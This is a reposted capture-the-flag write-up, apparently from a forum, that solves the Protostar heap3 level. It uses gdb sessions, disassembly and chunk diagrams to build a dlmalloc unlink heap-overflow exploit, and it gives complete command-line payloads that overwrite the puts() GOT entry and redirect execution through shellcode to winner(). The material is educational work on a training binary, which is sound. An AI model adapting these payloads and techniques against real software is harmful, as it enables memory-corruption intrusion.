Using a negative value for the previous chunk size forces the previous chunk to be calculated after the current chunk while avoiding null bytes. The value -4 was seleted for the sake of keeping everything dword aligned. Once the free() gets executed it segfaults trying to write to 0x44444444 + 0xc with the value 0x45454545. This was an expected behavior when trying to unlink the virtual chunk illustrated below:

 /------ Chunk A -------\ /------ Chunk B -------\ /------ Chunk C -------------\
+----+----+--------------+----+----+--------------+----+----+--------------------+
|    |    | AAAA         |    |    | BBBB...  BBBB|  -4|\xf0| CCCCDDDDEEEE       |
+----+----+--------------+----+----+--------------+----+----+--------------------+
                                                       :                         :
                                                       :/---- Virtual Chunk ----\:
                                                       +----+----+----+----+-----+
                                                       |\xf0|CCCC|DDDD|EEEE| ... |
                                                       +----+----+----+----+-----+
                                                                    |   |
                                                               fd --+   +-- bk

Selecting forward and backward links

At this point we need to decide which source and destination addresses to use in-place of the forward and backward links. The goal of the exercise is to execute the hidden winner() function:

(gdb) info address winner

Symbol "winner" is a function at address 0x8048864.

In order to call this function we could overwrite the GOT entry for the puts() call which is used at the very end of the main() function:

0x0804892e <main+165>:  mov    DWORD PTR [esp],0x804ac27
0x08048935 <main+172>:  call   0x8048790 <puts@plt>
0x0804893a <main+177>:  leave
0x0804893b <main+178>:  ret

Specifically, we need to overwrite the following address:

$ objdump -R heap3 | grep puts
0804b128 R_386_JUMP_SLOT   puts

Ideally, if we could set 0x804b128 - 0xc = 0x804b11c (to compensate for mov DWORD PTR [eax+0xc],edx) as the destination address and write the value 0x8048864, then we could gain the desired execution flow. Let's try it out:

(gdb) r AAAA `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x64\x88\x04\x08"'`

Program received signal SIGSEGV, Segmentation fault.

0x08049906 in free (mem=0x804c058) at common/malloc.c:3638

Oops, looks like we failed to write something; however, since the error occurs further down the copy operation let's see if it actually succeeded:

(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x08048864

Great, the GOT entry for puts() was overwritten with the address of winner(). Now let's investigate what caused the crash and whether we could go around it:

(gdb) x/4i $eip - 9
0x80498fd <free+217>:   mov    DWORD PTR [eax+0xc],edx   <-- succeeded
0x8049900 <free+220>:   mov    eax,DWORD PTR [ebp-0x18]
0x8049903 <free+223>:   mov    edx,DWORD PTR [ebp-0x14]
0x8049906 <free+226>:   mov    DWORD PTR [eax+0x8],edx   <-- failed

(gdb) i r eax edx
eax            0x8048864        134514788
edx            0x804b11c        134525212

As part of the unlinking process, just as we have tried to write to the offset from the forward link to overwrite GOT, we have also attempted to write to the back link which was the address of the winner() function. Let's investigate memory characteristics of that address:

(gdb) maintenance info sections
Exec file:
    `/opt/protostar/bin/heap3', file type elf32-i386.
      :
    0x80487b0->0x804abdc at 0x000007b0: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
      :
    0x804b0e4->0x804b0e8 at 0x000030e4: .got ALLOC LOAD DATA HAS_CONTENTS
    0x804b0e8->0x804b130 at 0x000030e8: .got.plt ALLOC LOAD DATA HAS_CONTENTS
    0x804b130->0x804b138 at 0x00003130: .data ALLOC LOAD DATA HAS_CONTENTS
    0x804b140->0x804b5d4 at 0x00003138: .bss ALLOC

The attempt to write to the address 0x8048864 (actually 0x8048864 + 0x8) failed because it is located in the .text section which is READONLY. The previous write to 0x804b128 - 0xc succeeded because the GOT section is writeable. Thus, we must find another address to write to puts() GOT entry that would be both executable and writeable at the same time. Let's try the first heap chunk 0x0804c008:

(gdb) r `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`

Program received signal SIGSEGV, Segmentation fault.

0x08049951 in free (mem=0x804c058) at common/malloc.c:3648

Another segmentation fault. Before we analyze and try to bypass this crash, let's see if the unlinking succeeded:

(gdb) x/12x 0x0804c008-8
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x0804b11c      0x41414141      0x41414141      0x41414141
0x804c020:      0x41414141      0x41414141      0x00000000      0x00000029

(gdb) x/x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x0804c008

The second mov operation successfully wrote to 0x804c008.

Virtual Next Chunk(s)

With the GOT entry overwritten with the address on the heap, we are now ready to massage the input so it successfully completes by analyzing the crash:

(gdb) x/i $eip
0x8049951 <free+301>:   mov    DWORD PTR [eax+0xc],edx
(gdb) i r eax edx
eax            0x0      0
edx            0x0      0

Just as before, the crash was caused due to an attempt to write to an invalid address. Let's reverse engineer the free() function a bit further to see how this can be alleviated:

0x8049909 <free+229>:   mov    eax,DWORD PTR [ebp-0x38] ; bin
0x804990c <free+232>:   mov    eax,DWORD PTR [eax+0x2c] ; bin[0x2c]
0x804990f <free+235>:   cmp    eax,DWORD PTR [ebp-0x28] ; compare with next_chunk
0x8049912 <free+238>:   je     0x80499b6 <free+402>

0x8049918 <free+244>:   mov    eax,DWORD PTR [ebp-0x24] ; next_chunk_size
0x804991b <free+247>:   mov    edx,DWORD PTR [ebp-0x28] ; next_chunk
0x804991e <free+250>:   lea    eax,[edx+eax*1]          ; next_next_chunk
0x8049921 <free+253>:   mov    eax,DWORD PTR [eax+0x4]  ; next_next_chunk_size
0x8049924 <free+256>:   and    eax,0x1                  ; PREV_INUSE
0x8049927 <free+259>:   mov    DWORD PTR [ebp-0x20],eax ; store flag value
0x804992a <free+262>:   mov    eax,DWORD PTR [ebp-0x28] ; next_chunk
0x804992d <free+265>:   mov    edx,DWORD PTR [ebp-0x24] ; next_chunk_size
0x8049930 <free+268>:   mov    DWORD PTR [eax+0x4],edx  ; store next_chunk_size
0x8049933 <free+271>:   cmp    DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE
0x8049937 <free+275>:   jne    0x8049963 <free+319>     ; jump if the flag is set

0x8049939 <free+277>:   mov    eax,DWORD PTR [ebp-0x28] ; next_chunk
0x804993c <free+280>:   mov    eax,DWORD PTR [eax+0x8]  ; next_chunk->fd
0x804993f <free+283>:   mov    DWORD PTR [ebp-0x14],eax ; FD
0x8049942 <free+286>:   mov    eax,DWORD PTR [ebp-0x28] ; next_chunk
0x8049945 <free+289>:   mov    eax,DWORD PTR [eax+0xc]  ; next_chunk-bk
0x8049948 <free+292>:   mov    DWORD PTR [ebp-0x18],eax ; BK

0x804994b <free+295>:   mov    eax,DWORD PTR [ebp-0x14] ; FD
0x804994e <free+298>:   mov    edx,DWORD PTR [ebp-0x18] ; BK
0x8049951 <free+301>:   mov    DWORD PTR [eax+0xc],edx  ; FD->bk = BK <-- crash
0x8049954 <free+304>:   mov    eax,DWORD PTR [ebp-0x18] ; BK
0x8049957 <free+307>:   mov    edx,DWORD PTR [ebp-0x14] ; FD
0x804995a <free+310>:   mov    DWORD PTR [eax+0x8],edx  ; BK->fd = FD <-- crash

The disassembly above should look very familiar to the unlink operation we have done to make the original write. In fact, just as we have done the backward consolidation with the previous chunk, we are doing a similar forward consolidation with the next chunk. This could be used to make another 4 byte write; however, since we only need one write to solve the exercise, let's find a way to simply skip this block of instructions by triggering the following jump:

0x8049933 <free+271>:   cmp    DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE
0x8049937 <free+275>:   jne    0x8049963 <free+319>     ; jump if the flag is set

This can be arranged by setting up another fake chunk by manipulating the overflown chunk size to be a negative number like \xf0\xff\xff\xff (-16) while still having the least two significant bits set to 0 in order to pass earlier checks:

/------ Chunk A -------\ /------ Chunk B -----------------------\ /-- Chunk C ..
+----+----+--------------+----+----+------------------------------+----+----+-----
|    |    | AAAA         |    |    | BBBB...  BBBB    \xff\xff... |  -4| -16|  ..
+----+----+--------------+----+----+------------------------------+----+----+-----
                                                   .`             `.
                                                 .`                 `.
                                               .`                     `.    
               /--- Next Next Chunk --\        :/----- Next Chunk -----\:
              +------+------+----------+       +------+------+----------+
              |..    |..\xff| ...  ... |       |..    |..\xff| ...  ... |
         +--> +------+------+----------+       +------+------+----------+
         |                |                                |
         |         size --+                                |
         |                                                 |
         +-------------------------------------------------+

The next chunk is calculated relative to the original overflown chunk by adding (-16) to it, thus ending up 16 bytes behind Chunk C. The size of the next chunk is calculated by zeroing out the last two bits, thus if we set the size of the virtual next chunk to \xff\xff\xff\xff, the actual recorded size will be 0xfffffffc or -4. When the piece of code above attempts to retrieve the "next next" chunk it will add -4 to the next chunk address thus ending up exactly 4 bytes behind the next chunk. By setting the "next next" chunk's size to have the least significant bit set (e.g. \x01) we can skip the block of code that caused the memory write fault:

(gdb) r `python -c 'print "\xcc"*32'` <-- shellcode


                next next chunk size --+          +-- next chunk size
                                       |          |
        `python -c 'print "B"*16 + "\x01"*4 + "\xff"*4 + "B"*8 + 
        "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff"'` 
            |                    |
            +-- prev chunk size  +-- chunk size
                    (-4)                (-16)


        `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`
                                   |                                |
                puts() GOT entry --+         shellcode in chunk A --+

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0804c00d in ?? ()

(gdb) x/12x $eip-1
0x804c00c:      0xcccccccc      0x0804b11c      0xcccccccc      0xcccccccc
0x804c01c:      0xcccccccc      0xcccccccc      0xcccccccc      0x00000000
0x804c02c:      0x00000029      0x00000000      0x42424242      0x42424242

Following all of the above manipulations the execution flow will end up in the shellcode located in the first chunk.

Finalizing the exploit

At this point we can deal with the corrupted byte at 0x804c010 by simply jumping over it with a short 2 byte jump, followed by a push/ret pivot to get to the final destination - the winner function:

$ ./heap3 `python -c 'print "AAAA" + "\xeb\x06" + "\x90"*6 + "\x68\x64\x88\x04\x08\xc3"'` `python -c 'print "B"*16 + "\x01"*4 + "\xff"*4 + "B"*8 + "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`

that wasn't too bad now, was it? @ 1398039369

The payload can be further optimized to make it less verbose at the expense of readability:

$ ./heap3 `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`

that wasn't too bad now, was it? @ 1398049859

External Links and References

Exploit Exercises - Protostar

Doug Lea Malloc

w00w00 on Heap Overflows

Phrack 57 - Vudo - An object superstitiously believed to embody magical powers

Phrack 57 - Once upon a free()...

Special Note

Thanks to the folks at Exploit Exercises for creating the excellent wargame. Particularly making the exercises highly pedagogical with progressive difficulty and building on previously learned material.

Published on May 25th, 2014 by iphelix

Sursa: https://thesprawl.org/research/exploit-exercises-protostar-heap/

Edited May 25, 2014 by Nytro

Sign In

exploit exercises - protostar - heap levels

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages